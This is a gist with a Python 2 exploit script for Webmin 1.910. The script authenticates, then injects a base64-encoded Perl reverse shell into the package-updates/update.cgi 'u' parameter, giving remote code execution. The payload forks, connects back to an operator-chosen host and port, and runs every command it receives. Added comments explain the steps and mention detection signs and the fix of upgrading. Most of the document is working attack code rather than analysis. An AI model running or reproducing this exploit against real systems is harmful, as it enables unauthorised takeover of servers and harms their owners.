@AzraelSec
Created March 14, 2020 20:02
This is a simple exploit for version 1.910 of the Webmin service that leads to Remote Code Execution.
#!/usr/bin/python
from requests import post
from urllib import quote
from base64 import b64encode
from requests.packages.urllib3 import disable_warnings
from urllib3.exceptions import InsecureRequestWarning
# Operator settings. Python 2 script (print statements, urllib.quote). These
# are placeholder strings and are never validated; a wrong RPORT/LPORT only
# shows up when the HTTP request or the callback connection fails.
USER = 'USER'
PASS = 'PASSWORD'
RHOST = 'REMOTE_IP'
RPORT = 'REMOTE_PORT'
LHOST = 'YOUR_IP'
LPORT = 'YOUR_PORT'
# Selects https in base_url(). Certificate verification is disabled on both
# post() calls (verify=False) and the resulting warning is silenced in __main__,
# so a man-in-the-middle of the attacker's own traffic would not be noticed.
SSL = True
# Perl one-liner the target ends up running: forks (parent exits), opens a TCP
# connection back to LHOST:LPORT, and runs each line read from it through
# system(). The doubled braces are str.format escapes for literal '{' / '}'.
# The '/(.*)/' captures on %ENV and on input look like the Perl taint-mode
# untainting idiom -- TODO confirm. Trailing ';' is an empty Python statement.
# Detection angle: the Webmin process tree spawns bash -> base64 -> perl, and
# perl makes an outbound connection to LHOST:LPORT.
PAYLOAD = "perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){{if($ENV{{$key}}=~/(.*)/){{$ENV{{$key}}=$1;}}}}$c=new IO::Socket::INET(PeerAddr,\"{}:{}\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){{if($_=~ /(.*)/){{system $1;}}}};'".format(LHOST, LPORT);
# What is actually injected into the request body: bash decodes the base64
# blob of PAYLOAD and pipes it into an interactive bash. b64encode() on a str
# is Python 2 behaviour; under Python 3 it would need bytes.
PAYLOAD_ENCODED = ('bash -c "{echo,' + b64encode(PAYLOAD) + '}|{base64,-d}|{bash,-i}"')
def base_url():
    """Return the target's root URL, '<scheme>://RHOST:RPORT/', https when SSL is set."""
    scheme = 'https' if SSL else 'http'
    return '%s://%s:%s/' % (scheme, RHOST, RPORT)
def login():
    """Authenticate against session_login.cgi and return the 'sid' session cookie.

    USER/PASS go in the form body; the testing/redirect/sid cookies are sent
    alongside the login request. Redirects are not followed so the cookie is
    read from the login response itself, with TLS verification disabled.

    Raises:
        KeyError: if the response sets no 'sid' cookie (e.g. wrong credentials),
            which aborts the script before deliver_payload() runs.
    """
    params = {'user':USER, 'pass':PASS}
    cookies = dict(testing='1', redirect='1', sid='x')
    response = post(base_url() + 'session_login.cgi', data=params, cookies=cookies, verify=False, allow_redirects=False)
    return response.cookies['sid']
def deliver_payload(sid):
    """POST the command-injection request to package-updates/update.cgi.

    The body carries two 'u' values; the second one is ' | <PAYLOAD_ENCODED>',
    which suggests the package name reaches a shell unescaped on the affected
    version (1.910) -- confirm against the vendor advisory. On the server this
    is visible as a POST to package-updates/update.cgi whose u= parameter
    contains shell metacharacters; upgrading Webmin beyond 1.910 is the fix.

    Args:
        sid: session cookie value returned by login().

    Returns:
        None. The HTTP response is discarded, so the caller cannot tell
        whether the request was accepted.
    """
    # Raw string body, not a dict: requests sends it verbatim, so the ' | '
    # and the payload are not URL-encoded (the imported quote() is never used).
    data = "u=acl/apt&u= | {}&ok_top=Update+Selected+Packages".format(PAYLOAD_ENCODED)
    cookies = {'sid':sid}
    # Referer points at the package-updates page; content-type is set
    # explicitly because data is a plain string rather than form fields.
    headers = {'content-type': 'application/x-www-form-urlencoded', 'Referer':'{}/package-updates/?xnavigation=1'.format(base_url())}
    try:
        # No timeout and no status check; a Ctrl-C while this call blocks is
        # swallowed below and __main__ still prints 'Attack completed'.
        response = post(base_url() + 'package-updates/update.cgi', cookies=cookies, headers=headers, data=data, verify=False, allow_redirects=False)
    except KeyboardInterrupt:
        pass
def banner():
    """Print the ASCII-art banner and author credit to stdout (Python 2 print)."""
    rows = (
        " __ __ _ _ __ ___ __ ___ ",
        " \ \ / / | | (_) /_ | / _ \/_ | / _ \ ",
        " \ \ /\ / /___ | |__ _ __ ___ _ _ __ ______ | | | (_) || || | | |",
        " \ \/ \/ // _ \| '_ \ | '_ \`_ \ | || '_ \|______|| | \__, || || | | |",
        " \ /\ /| __/| |_) || | | | | || || | | | | | _ / / | || |_| |",
        " \/ \/ \___||_.__/ |_| |_| |_||_||_| |_| |_|(_)/_/ |_| \___/ ",
        " ",
        " -> coded by AzraelSec (federicogerardi94[at]gmail.com) \n",
    )
    for row in rows:
        print row
if __name__ == '__main__':
    banner()
    print 'Connecting to {}'.format(base_url())
    # Silence the InsecureRequestWarning that verify=False would otherwise emit
    # on every request.
    disable_warnings(category=InsecureRequestWarning)
    # login() raises KeyError when no 'sid' cookie comes back, so a failed
    # login stops the run here with a traceback.
    session_cookie = login()
    print 'Cookies forged: {}'.format(session_cookie)
    print 'Attacking using this payload: {}'.format(PAYLOAD)
    deliver_payload(session_cookie)
    # Printed unconditionally: deliver_payload() reports nothing about the
    # outcome of the request.
    print 'Attack completed :)'